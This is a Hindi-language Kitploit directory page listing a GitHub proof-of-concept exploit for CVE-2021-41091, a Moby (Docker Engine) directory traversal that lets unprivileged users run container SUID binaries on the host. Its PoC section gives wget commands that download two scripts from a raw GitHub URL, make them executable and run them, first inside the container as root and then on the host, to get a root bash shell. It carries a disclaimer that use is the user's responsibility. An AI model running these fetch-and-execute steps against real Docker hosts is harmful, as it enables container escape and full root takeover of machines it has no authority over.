Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41091 — CVE-2021-41091 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Moby (Docker Engine) निर्देशिका ट्रैवर्सल जो अनपेक्षित उपयोगकर्ताओं को होस्ट पर कंटेनर से SUID बाइनरी निष्पादित करने की अनुमति देता है। Ubuntu 20.04 के लिए PoC स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/jrbh4ck/cve-2021-41091
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकंटेनर एस्केप
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

CVE-2021-41091 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Moby (Docker Engine) निर्देशिका ट्रैवर्सल जो अनपेक्षित उपयोगकर्ताओं को होस्ट पर कंटेनर से SUID बाइनरी निष्पादित करने की अनुमति देता है। Ubuntu 20.04 के लिए PoC स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
162 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41091

Moby (Docker Engine) में एक बग अनुमति रहित उपयोगकर्ताओं को निर्देशिकाओं को पार करने और डॉकर से सीधे मुख्य मशीन पर प्रोग्राम निष्पादित करने की अनुमति देता है, यदि डॉकर में एक suid प्रोग्राम मौजूद है तो उपयोगकर्ता इसे मुख्य मशीन पर suid के रूप में निष्पादित कर सकता है

PoC

कंटेनर के टर्मिनल में हम docker.sh फ़ाइल डाउनलोड करते हैं, फिर इसे रूट उपयोगकर्ता के रूप में निष्पादित करते हैं:

wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

अब मुख्य मशीन पर हम principal.sh फ़ाइल डाउनलोड करते हैं और इसे निष्पादित करते हैं:

wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

हम वह कमांड निष्पादित करते हैं जो फ़ाइल हमें देगा और हम /bin/bash को रूट के रूप में निष्पादित करने में सक्षम होंगे

नोट्स

ये स्क्रिप्ट Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) पर Moby 20.10.5+dfsg1 संस्करण के साथ परीक्षण की गई थीं

इस रिपॉजिटरी का उपयोग उपयोगकर्ता की जिम्मेदारी है, लेखक की नहीं

टूल डाउनलोड करें